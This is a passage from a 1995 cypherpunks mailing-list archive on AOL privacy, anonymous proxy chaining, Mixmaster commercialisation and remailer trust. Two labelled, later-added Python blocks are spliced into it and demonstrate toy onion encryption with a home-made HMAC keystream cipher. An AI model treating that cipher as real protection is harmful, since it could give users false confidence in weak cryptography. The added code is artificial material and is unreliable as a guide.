would keep their own logs about just what you do online.  They wouldn't 
have to steal a copy of the log from your hard drive to find this out...

A further hint as to why this won't work:  the client software doesn't 
keep track of which messages you've read in a discussion area, AOL's 
servers do.  How do I know this?  Because I use AOL on a Mac from home, 
and from Windows at work.  Completely separate installations, yet AOL 
remembers which messages are New or rather unread to me regardless of 
which of the clients I use.  So if they keep that info on their side, 
they sure as hell wouldn't keep the logs of the files you've downloaded 
on yours.  Making the download database read only is a silly measure, not 
likely to do anything for you.

If you want to protect what is on your system, it's easy.  Encrypt your 
whole hard drive except for about 20Mb or so, and don't mount the 
encrypted portion when going on AOL.  Leave a copy of Windows with 
nothing but AOL in it outside, and use that copy.  If their software 
tries to access another drive, they don't get a clue as to what you have 
or don't -- other than DOS and Windows and their client. :-)

There are probably a dozen more ways of doing this.... i.e. booting off a 
SyQuest or M.O. cartridge, using another computer to download files, 
using another PC which has nothing on it, using these in combination with 
using another account - not just another screen name, etc.

Bad thing is that this will mean a lot of extra work on your part...  But 
from the sounds of this, the precautions offered here are just another 
net.legend in the making...

If I were AOL, I would have written their side of the software to track 
the files, not the client side.  Further, if I wanted to (I'm not AOL, 
nor do I want to do the following, nor do I have any knowledge of how 
AOL's clients were written...) if I wanted to check out your hard 
drive, I would include directory searching routines in the client, as 
well as a way to transfer info back on any file or the file itself to 
AOL.  However this would be obvious to any smart user as they would see 
their external modem's XMIT LED light up like christmas in a very 
suspicious way.

There is no way to know if such code exists in the AOL client, however, 
if there is, as unlikely as the possibility is, you still can hide your 
files from such possible privacy invasion techniques.

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sun, 17 Sep 95 03:11:09 PDT
To: Aleph One <aleph1@dfw.net>
Subject: Re: Anonymous WWW proxies
In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr>
Message-ID: <9509171010.AA11011@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Aleph One writes:
 > What's the problem of using CERN in proxy mode? You can even set it up to
 > do chaining.
The chaining is not dynamic (but it is maybe patchable)?
I don't think there is support for encryption (ssl patches maybe?) ?
Also, CERN httpd is a huge thing, maybe some smaller proxy would
do... 
My development is/could be based on my httpd, but simplified... I'll
have a look at standalone already existing proxies before reinventing
the wheel...


Regards
dl

-- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: one hundred five thousand one hundred five billion one hundred five thousand one hundred sixty-seven




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sun, 17 Sep 95 03:17:15 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: Anonymous WWW proxies
In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr>
Message-ID: <9509171016.AA11022@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Christian Wettergren writes:
 > |  + Chaining would be a imo good idea (ie cli <-> anonproxy1 <->
 > |    anonproxy2 <-> ... <-> server) but how would you manage to tell
 > |    your favorite web browser to add in its header something like
 > |    Http-Proxy-List: anonproxy2, ...
 > |    An alternative would be to have a database of available (running)
 > |    proxies and that the proxy itself randomly choose a next route ?

 > Don't most of the browsers support a "firewall-proxy-mode", where
 > all queries are sent off to a special daemon, that forwards the query
 > on. This would probably be the place to add the header-munging.
yes, they support one level of proxying, but not several as far as I
know (so chaining must be done by the proxy itself as I suggested
below)

 > How do you plan to get the reverse-path working? Having a
 > encrypted/chained return path in the request?
Reverse path is not a problem because WWW works with a bidirectional
connection, so you get the answer to your query on the same path as you
send it (it's client <-> proxy1 ... (<-> and not ->))

Regards
dl

-- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: one hundred five thousand one hundred five billion one hundred five thousand one hundred sixty-seven
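
[Added example, not part of the original posts or anyone's actual proxy code.] The chaining options raised in the "Anonymous WWW proxies" messages above, side by side: a plaintext Http-Proxy-List header versus a local proxy that picks a random route and wraps the request in one encrypted layer per hop, with the reply retracing the same connections. The proxy names, the shared demo keys, the layered reply, and the toy HMAC-SHA256 cipher (standing in for the PGP encryption the post suggests) are all assumptions.

```python
import hashlib
import hmac
import json
import os
import random

# Constructed directory of running proxies -> key shared with the client.
# Names and keys are placeholders; the post proposes PGP keys instead.
DIRECTORY = {f"anonproxy{i}": hashlib.sha256(f"demo-key-{i}".encode()).digest()
             for i in range(1, 6)}


def _subkey(key, label):
    return hmac.new(key, label, hashlib.sha256).digest()


def _keystream(key, nonce, length):
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def seal(key, plaintext):
    """Toy encrypt-then-MAC layer (HMAC-SHA256 keystream); a stand-in for PGP."""
    nonce = os.urandom(16)
    stream = _keystream(_subkey(key, b"enc"), nonce, len(plaintext))
    ct = bytes(a ^ b for a, b in zip(plaintext, stream))
    tag = hmac.new(_subkey(key, b"mac"), nonce + ct, hashlib.sha256).digest()
    return nonce + tag + ct


def unseal(key, blob):
    nonce, tag, ct = blob[:16], blob[16:48], blob[48:]
    expect = hmac.new(_subkey(key, b"mac"), nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expect):
        raise ValueError("layer failed authentication")
    stream = _keystream(_subkey(key, b"enc"), nonce, len(ct))
    return bytes(a ^ b for a, b in zip(ct, stream))


def pick_route(directory, hops, rng=None):
    """Local proxy picks distinct hops at random from the list of running proxies."""
    rng = rng or random.SystemRandom()
    return rng.sample(sorted(directory), hops)


def header_chain(route, url):
    """Plaintext Http-Proxy-List chaining: what each hop can read."""
    views, remaining = {}, list(route)
    while remaining:
        hop = remaining.pop(0)
        views[hop] = {"next": remaining[0] if remaining else "server",
                      "sees_route": list(remaining), "sees_url": url}
    return views


def wrap(route, url, directory):
    """Build layers inside-out: only the exit proxy's layer holds the URL."""
    blob = seal(directory[route[-1]], json.dumps({"fetch": url}).encode())
    for hop, nxt in zip(reversed(route[:-1]), reversed(route[1:])):
        layer = json.dumps({"next": nxt, "blob": blob.hex()}).encode()
        blob = seal(directory[hop], layer)
    return blob


def peel(hop, blob, directory):
    """One proxy removes its own layer and learns only the next step."""
    return json.loads(unseal(directory[hop], blob))


def layered_chain(route, url, directory):
    """Forward the wrapped request hop by hop, recording what each hop reads."""
    views, hop, blob = {}, route[0], wrap(route, url, directory)
    while True:
        layer = peel(hop, blob, directory)
        if "fetch" in layer:
            views[hop] = {"next": "server", "sees_url": layer["fetch"]}
            return views
        views[hop] = {"next": layer["next"], "sees_url": None}
        hop, blob = layer["next"], bytes.fromhex(layer["blob"])


def return_path(route, body, directory):
    """Reply retraces the same connections; each hop adds a layer, client strips them."""
    blob = body
    for hop in reversed(route):   # exit proxy seals first, entry proxy last
        blob = seal(directory[hop], blob)
    for hop in route:             # client removes the entry proxy's layer first
        blob = unseal(directory[hop], blob)
    return blob


if __name__ == "__main__":
    route = pick_route(DIRECTORY, 3)
    print(header_chain(route, "http://example.org/"))
    print(layered_chain(route, "http://example.org/", DIRECTORY))
```

With the plaintext header every hop reads the destination URL and the rest of the route; with layers the entry proxy learns only its successor, and only the exit proxy sees the URL.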




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 17 Sep 95 12:25:41 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster Licensing Offer Explained
Message-ID: <ac81c0b51f0210042c27@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(I've trimmed the mailing lists I'm not on...)

At 8:01 AM 9/17/95, Lance Cottrell wrote:

> Permission is granted to distribute this document in any media for any
>purpose as long as the entire document is distributed with the attached
>digital signature intact, or the document is clearly marked as having been
>modified with the locations of deleted text indicated.

So sue me. :-}

(That is, I'll treat this article in the normal way, trimming sections I'm
not responding to and making note of elisions only where I think it
important to.)

...
>The company offering to license Mixmaster is Phoenix DataNet, a Houston
>area ISP. John Perry, a person well known to this list and the remailer
>community in general, is a Senior Systems Administrator at Phoenix.
>
>On Thursday I received a call from John. Some others at Phoenix had just
>noticed a Mixmaster remailer he had been running on one of their machines.
>Phoenix has several large corporate customers who need secure transactions
>for some special applications. The core engine of Mixmaster is well suited
>to that purpose. They offered to license the code from me to use as the
>framework on which to build these other programs. In the process they will
>rewrite many basic functions in Mixmaster that need major overhaul (e.g.,
>key management). We will incorporate those improvements back into
>Mixmaster. This should lead to porting Mixmaster to several other
>platforms, and to fixing most of my worst coding atrocities.

First, I think it generally a Good Thing that remailer software gets
commercialized and cleaned-up, or that at least commercial packages exist.
(I'm not going to get into commercial vs. non-commercial and Microsoft vs.
Gnu issues.) If Lance makes a bunch of money off this, more power to him.

However, this commercialization raises some interesting issues. Others have
dealt with various concerns about the code integrity, about features added,
and even about TLA access. I'll address some liability and legal issues.

* Will Phoenix DataNet be making the mix software available for purchase,
or are they funding _internal development_? (That is, mixes for their
corporate clients, which raises some interesting issues in and of itself,
as discussed below.)

* If Phoenix is planning to resell Mixmaster, or whatever they call it (as
"Mixmaster" may remain a trademark of the appliance company which
originated the name), what will be their liability for the various abuses
which are likely to occur? None of the existing remailers/mixes has had
"corporate" backing, and the "deep pockets" corporations are often presumed
to have, so lawsuits have not gone after corporations.

* On the other hand, if Phoenix is primarily aiming at internal use, for
specified corporate customers, how will they stop others from using the
service?

If chaining is used, and absent any special "untraceable postage tokens"
they might issue (as one way to control access), how will the Nth mix in a
chain of M mixes "know" whether an incoming message can be remailed or not?

(Schemes to sign the packets obviously flunk the anonymity test.)

There are many other interesting issues which crop up when Giant
Corporation begins to deploy and use remailers. What if, for example, the
Justice Department claims that Phoenix and its customers are using
remailers for price fixing and collusion? (Just to be clear on this, I
personally have no problems with such collusion....but the Antitrust people
see things differently.)

(To be sure, telephones can and of course have been used to collude.
Partly, wiretaps help here (until voice encryption happens...). But Justice
has gone after airline reservation computer systems which they believe were
used to "signal" price information. Imagine how overjoyed they'll be to see
Phoenix DataNet deploy their system!)

Again, don't confuse my arguing points here with any kind of advocacy of
the Justice Department/Antitrust Division position. I'm only trying to
think out what some of the legal issues will be that face the first
U.S.-domiciled company to actually start selling remailers or to set up a
remailer network for customers.

Interesting times ahead.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sun, 17 Sep 95 12:44:03 PDT
To: Ray Arachelian <sunder@amanda.dorsai.org>
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <9509171945.AA26239@accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Ray Arachelian

And that's where we, the cypherpunks come in, by advocating strong 
cryptographic protocols and tools, we can keep every machine safe from 
intrusion; it's not just Uncle Sam's evil minions that should have total 
privacy; normal citizens need privacy too - the spooks shouldn't be the 
only ones with it.  :-)

This message has been brought to you by the Cypherpunks.  Use only 
Cypherpunks brand software ;-D
................................................

Cypherpunk crypto in every computer in every home.

   <g>

  ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 17 Sep 95 09:58:34 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Commercial Mixmaster
In-Reply-To: <199509170348.XAA06314@bwh.harvard.edu>
Message-ID: <199509171656.MAA27949@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 	It's worth noting that the source code to Julf's Penet remailer
> is not public (AFAIK).  People use it because they trust Julf, or
> trust people who trust Julf.

Yeah, but remember -- there is very little that Julf's code could do
to "cheat". Julf's system maintains a mapping of users to aliases
anyway, so he has no need to "pervert" the system -- he can do
all the bad things we worry about with it working correctly. We
therefore need not see the code to trust the system, because the only
way that the system is trustworthy is if Julf is trustworthy.

Other systems based on cryptography might not be in this position.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David C. Lambert" <dcl@panix.com>
Date: Sun, 17 Sep 95 10:16:06 PDT
To: unicorn@polaris.mindport.net
Subject: Re: CYPHERPUNK considered harmful
Message-ID: <199509171657.MAA26446@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn <unicorn@polaris.mindport.net> wrote:
> On Fri, 15 Sep 1995, David C. Lambert wrote:
>
> > BTW, I'm not for changing the name of the list, but I do see the logic
> > in a more establishment-friendly name to use when lobbying the public.
> 
> Distrubute [sic] watered down cypherpunk "teachings" in more benign forms which 
> hide their true (Ohhh! Scary!) potential in an effort to make them commonly 
> acceptable to joe sixpack.

I believe you misstate the point that people are trying to make.

I haven't seen anyone advocating the "watering down" of any so-called
"teachings" to "hide" any "true potential".  The only thing that people
have mentioned is that some of the less clueful out there have a knee
jerk response to the name "cypherpunk".  That's all.

> Can't we all see what road this leads down?

No.  Please enlighten us.

> At the risk of politicizing the issue, I wouldn't be the first to call this 
> "left-speak" or "term-sanitizing."

And this matters because...?

> Really the core issue is that the citizens of their respective nations 
> need to either:
> 
> 1>  See cryptography for the important individual rights issue that it
> is and latch on to the basic desire for free and unmonitored commerce and 
> exchange without censorship or observation.
> 
> or
> 
> 2>  Decide that they are not interested in the issues because these 
> issues are too radical, or simply because their own political ideas
> fall left (or statist) of this spectrum.

What exactly is it that you feel "the citizens of their respective
nations" are doing right now, if not this?

> in the end I 
> don't care if every joe sixpack on the planet uses real crypto, just so
> long as those I am to conduct commerce (of data or goods) with do.

If this is the case, then I'm at a loss to understand how you fail to see
the merit in a "term-sanitizing", as you put it, in order to make the use
of strong crypto desired and required by Joe Sixpack.  How do you expect
the legality of strong crypto to survive unless Joe and his friends exert
political pressure to keep it alive?  Isn't it obvious that unless this
happens, that strong (unescrowed) crypto is on the path to being outlawed
(at least in the US, and several other countries)?

> The final judgement will be in the advantage of velocity and security of 
> transactions and the wealth that this "allocates" to those wise enough to 
> adopt crypto exchange systems.  Evolution in action.  If this makes me 
> elitist, so be it.

Elitist or not, this is beside the point.  People are bringing up political
and rhetorical concerns because they feel that political and persuasive
methods are required *right now* in order to preserve the *legality* of 
strong crypto.  I only care about whether Joe Sixpack wants strong crypto
because if I can't persuade him that he does, he won't help me keep it
legal in my country of residence.  Once its legality seems safe(r) from
attack, he can go on using rot13 for all I care.


David C. Lambert
dcl@panix.com
(finger for PGP public key)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFxSiapplsfgM88VAQGj5wQAoY2FQe0rh0InWF1xOmST91QDCy4TrYUj
Y6Vnu/i3yspS/vDsKLMbIYAezAJEtgOPHEOf7Rv1Y4gKDyZNAJbYESXiYTQXD7O3
SNWNtb9nAT6l1RPqsnFR9yWAWYQ1CS3dLRpNpMBIqzL/HnKyKrgitLKQ530XtF8O
78u6jtmsBa4=
=Jgoe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sun, 17 Sep 95 13:20:14 PDT
To: cypherpunks
Subject: Intellectual Property and Crypto collision
Message-ID: <9509172020.AA23349@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> ELECTRONIC MEDIA PROTECTED UNDER COPYRIGHT LAW
> A presidential task force has recommended that electronic transmission of
> books, magazine articles and software should be classified as copies
> subject to existing copyright laws.   The task force also recommended that
> it should be illegal to make or distribute products aimed at decoding
> encrypted software without the consent of the copyright owner. 

Would this make it illegal to produce tools for decrypting key-escrowed
software?   :-)

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Sun, 17 Sep 95 10:33:38 PDT
To: Steven Levy <steven@echonyc.com>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.3.89.9509162002.A11836-0100000@echonyc>
Message-ID: <Pine.SUN.3.91.950917132658.21182B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Sep 1995, Steven Levy wrote:

> 
> >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> >is curiosity." 
> 
> It may not be a crime, but it's not nice to steal a title.
> 

Well, it IS kinda a common word these days.  The Beatles and Madonna both 
have a song called "Rain" -- this doesn't mean Madonna stole it, does it?

Jon	
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sun, 17 Sep 95 05:37:01 PDT
To: roy@cybrspc.mn.org
Subject: Re: CYPHERPUNK considered harmful
In-Reply-To: <950916.115448.5Q5.rnr.w165w@cybrspc.mn.org>
Message-ID: <18742.9509171235@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Roy Silvernail <roy@cybrspc.mn.org> writes:
> In list.cypherpunks, aba@dcs.exeter.ac.uk writes:
> > One thing I have been thinking would be nice would be a USENET
> > newsgroup, as mailing lists are a step away from easy access which
> > some people never make.
> 
> That's a feature, not a bug.  Unless the group was moderated, I predict
> the S/N ratio to be <= 0.  Witness the crap in alt.2600.

I think you misunderstand what I was saying, I wasn't saying *instead
of*, but *as well as*, and with a different purpose, just a comment on
Peter's post as to creating *another* group / list with a different
purpose, one to specifically further his ideas on transferring
technology to more people.

> The mailing list, as someone said before me, works as a limited
> pre-screening system.  Given the nature of the list's focus and
> discussion, I think a newsgroup would end up being a stable
> attractor for the clue-deficit crowd.  Not something I'd find
> useful.

So I most definitely agree with the likely effects of for instance
merging the list and a newsgroup with a mail to news gateway, as
someone suggested, this would be a really bad idea, and would open the
list to a flood of junk.

If a group such as say alt.cypherpunks were created, it would be just
yet another group which hosts endless directionless arguments with
David Sternlight, etc. via huge cross posting.

Perhaps it would be better to just post crypto FAQs to existing crypto
groups, to further use of crypto.

A later suggestion someone else had was of a read-only mailing list
mirror in a newsgroup.  I'm not sure about this, I mean yes it would
allow more people to casually read, and this is what I use Todd
Masco's nntp.hks.net nntp server for, and find it a really nice way to
read, much nicer than a mail box, even if it was slower for me.  Of
course there are software solutions which allow you to set up similar
effects yourself, but as a standard read-only newsgroup, I think it
would likely increase readership.  But I'm not sure, I mean even that
is likely to get the list some more junk, as it will be less of a barrier
to post, I mean all you have to do is send to cypherpunks@toad.com,
after all, and it wouldn't take a lot to figure that out.

Undecided as to whether a read only newsgroup in mail.cypherpunks or
something would be a good idea or not.  I'm sure it already happens a
lot of places, so perhaps it won't make a lot of difference.

But I definitely wasn't advocating gating an alt group to cpunks and
vice-versa.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 17 Sep 95 14:22:45 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful
Message-ID: <199509172122.OAA00733@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>I haven't seen anyone advocating the "watering down" of any so-called
>"teachings" to "hide" any "true potential".  The only thing that people
>have mentioned is that some of the less clueful out there have a knee
>jerk response to the name "cypherpunk".  That's all.

At least early on, back when we were getting our 15 kilobytes of fame
on the front covers of WiReD and the NYT magazine section, the name
appeared to be useful for getting attention; Tim and Eric were getting
occasional quotes in the mundane press, as was John Gilmore who has
had longer-term relationships with some of the press through his
other activities.  Maybe the NYT isn't the paragon of respectability
that it once was.....
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 17 Sep 95 14:40:32 PDT
To: cypherpunks@toad.com
Subject: "Attachments"
Message-ID: <ac81e3df200210046fa3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Why do people keep sending "attachments"?

This was just a text article, and not an application (program), so why was
it included as an "attachment"?

At 8:27 PM 9/17/95, Michael Shields wrote:
>Attachment converted: Macintosh HD:cypherpunks as a newsgroup (????/----)
>(00005C4E)

The message was, as Microsoft Word 6.0 saw it:

-----BEGIN PGP SIGNED MESSAGE-----

The general opinion seems to be that the netnews format is very
convenient, though we should keep the list; but that entering Usenet or
Altnet would lower the S/N.

Why not, then, start a new hierarchy?  Why not gate cypherpunks not to
alt.cypherpunks or comp.security.cypherpunks, but to crypto.cypherpunks?
We could feed it freely between us and set up NNTP servers which are
open for just crypto.*.  c.c would be the only crypto.* group for now,
but it would also be easy to add more -- say, for the "respectable"
splinter group, or for protocol WGs.  We'd get the convenience of netnews
without the high profile.

I'm willing to run the gateway on news.tembel.org and feed other sites,
if people think crypto.cypherpunks is a good idea.  Opinions?
- --
Shields.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFyEm+yjYMb1RsVfAQF1YQQAneg8c6yUKJUUybqepl52yqyS53OGrpLq
YfdrMYaIxMWdWKNpMAAus/g8WjWMwYrrB4p+8/WLMm4HsUEHO2ouNzbraiyMRwaB
NEhf0v/91h9jGniZIX5uQyqSdM/VC5YupWV0cITqKte9iLZR77C5hVqXBiLhRcwG
YL8GwDP5tYw=
=roIF
-----END PGP SIGNATURE-----

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 17 Sep 95 15:01:34 PDT
To: cypherpunks@toad.com
Subject: Re: Commercial Mixmaster
Message-ID: <ac81e66b21021004091d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:34 PM 9/17/95, hallam@w3.org wrote:

>I seem to remember that Julf took over Stephie's code from Wizvax which
>used to
>post into the alt.sex.bondage group. I suspect he has modified it since but I
>don't think that there is much to it.

Actually, it was the code of Karl Kleinpaste that Julf took over...I seem
to recall Julf saying this in an article. In any case, this is what Karl
claimed last year:

"There are 3 sites out there which have my software: anon.penet.fi, tygra,
and uiuc.edu.  I have philosophical disagreement with the "universal reach"
policy of anon.penet.fi (whose code is now a long-detached strain from the
original software I gave Julf -- indeed, by now it may be a complete
rewrite, I simply don't know); ....Very bluntly, having tried to run anon
servers twice, and having had both go down due to actual legal
difficulties, I don't trust people with them any more."
[Karl_Kleinpaste@cs.cmu.edu, alt.privacy.anon-server, 1994-08-29]


>How does the cypherpunks remailer work? Does PGP encrypt the signature of a
>message so that the identity of the sender is unknown? Or is it simply PEM
>style
>encryption so that the DN of the sender is in the clear :-(

Assuming this is a serious question and not a troll, cypherpunks remailers
(at least the ones I have used) completely encapsulate a message. No stuff
"dangles outside" the remailed part.

When PGP encryption is used, nothing is outside the block. If Alice sends
something to Bob's Remailer, Bob decrypts the message and may or may not
find further encrypted blocks inside. Envelopes within envelopes.

I can't imagine it being done any other way. (I'm not counting the
remailers possibly signing the sent messages, as a way of protecting
against tampering, but this reveals nothing about the senders.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

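Tim May's "envelopes within envelopes" description above, sketched as an added example (not code from the post or from any remailer): each hop peels one layer and learns only where to forward the rest. A shared-key encrypt-then-MAC construction from the standard library stands in for PGP public-key encryption, and the hop names, addresses and envelope layout are constructed for illustration.

```python
import hashlib
import hmac
import os

NONCE_LEN, TAG_LEN = 16, 32
MESSAGE = b"Meet at the usual place.\n"   # constructed sample message


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode, used here as a stream cipher."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        block = hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256)
        out += block.digest()
        counter += 1
    return bytes(out[:length])


def subkeys(hop_key: bytes):
    """Derive separate encryption and MAC keys from one hop key."""
    enc = hmac.new(hop_key, b"enc", hashlib.sha256).digest()
    mac = hmac.new(hop_key, b"mac", hashlib.sha256).digest()
    return enc, mac


def seal(hop_key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC one envelope (assumed stand-in for PGP to that hop)."""
    enc_key, mac_key = subkeys(hop_key)
    nonce = os.urandom(NONCE_LEN)
    stream = keystream(enc_key, nonce, len(plaintext))
    body = bytes(p ^ k for p, k in zip(plaintext, stream))
    tag = hmac.new(mac_key, nonce + body, hashlib.sha256).digest()
    return nonce + body + tag


def unseal(hop_key: bytes, blob: bytes) -> bytes:
    """Verify the tag, then decrypt; raises ValueError on any modification."""
    if len(blob) < NONCE_LEN + TAG_LEN:
        raise ValueError("envelope too short")
    enc_key, mac_key = subkeys(hop_key)
    nonce, body, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("envelope was modified in transit")
    stream = keystream(enc_key, nonce, len(body))
    return bytes(c ^ k for c, k in zip(body, stream))


def build_onion(message: bytes, recipient: str, chain: list, keys: dict):
    """Wrap innermost-first. Constructed layout: b'<next address>\\n<payload>'.

    The sender's address is never placed inside any layer.
    """
    inner = recipient.encode() + b"\n" + message
    blob = b""
    for hop in reversed(chain):
        blob = seal(keys[hop], inner)          # only `hop` can open this layer
        inner = hop.encode() + b"\n" + blob    # instruction for the hop before it
    return chain[0], blob


def remailer_process(hop_key: bytes, blob: bytes):
    """What one remailer does: peel its layer, read the next address."""
    next_addr, _, payload = unseal(hop_key, blob).partition(b"\n")
    return next_addr.decode(), payload


def route(sender: str, first_hop: str, blob: bytes, keys: dict):
    """Pass the envelope along the chain and record what each hop could see."""
    views = []
    prev, here, payload = sender, first_hop, blob
    while here in keys:                        # stop at the first non-remailer
        nxt, payload = remailer_process(keys[here], payload)
        views.append({"hop": here, "received_from": prev,
                      "forwards_to": nxt, "sees": payload})
        prev, here = here, nxt
    return here, payload, views


def demo():
    chain = ["remailer-a.example", "remailer-b.example", "remailer-c.example"]
    keys = {hop: os.urandom(32) for hop in chain}
    first_hop, blob = build_onion(MESSAGE, "bob@example.org", chain, keys)
    return route("alice@example.org", first_hop, blob, keys)


if __name__ == "__main__":
    recipient, delivered, views = demo()
    for v in views:
        print(f'{v["hop"]}: from {v["received_from"]} -> {v["forwards_to"]} '
              f'({len(v["sees"])} bytes visible after peeling)')
    print("delivered to", recipient, ":", delivered)
```

Only the first hop sees the sender's address and only the last hop sees the recipient and the plaintext; encrypting the message to the recipient as well would hide the plaintext from the last hop too.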





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sun, 17 Sep 95 13:39:22 PDT
To: cypherpunks@toad.com
Subject: Re: Commercial Mixmaster
In-Reply-To: <199509170513.AA06296@ideath.goldenbear.com>
Message-ID: <9509172034.AA07230@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:

>	It's worth noting that the source code to Julf's Penet remailer
> is not public (AFAIK).  People use it because they trust Julf, or
> trust people who trust Julf.

I seem to remember that Julf took over Stephie's code from Wizvax which used to 
post into the alt.sex.bondage group. I suspect he has modified it since but I 
don't think that there is much to it. 

Even if Julf released some code there would be no way of knowing that it was the 
code he runs except by compromising the anonymity of the service itself. In any 
case it is clear that the confidentiality of the service relies entirely on the 
trustworthiness of Julf and the security of the lines into Julf's server. I 
accept the former but can't believe for a moment that every spook and his aunt 
doesn't have a tap on the latter.


How does the cypherpunks remailer work? Does PGP encrypt the signature of a 
message so that the identity of the sender is unknown? Or is it simply PEM style 
encryption so that the DN of the sender is in the clear :-(

I
		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 17 Sep 95 13:53:27 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <199509170217.WAA10568@clark.net>
Message-ID: <Pine.D-G.3.91.950917165319.7821D-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Sep 1995, Ray Cromwell wrote:

> > 
> > >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> > >is curiosity." 
> > 
> > It may not be a crime, but it's not nice to steal a title.
> 
>  I think there's a high probability of someone independently inventing
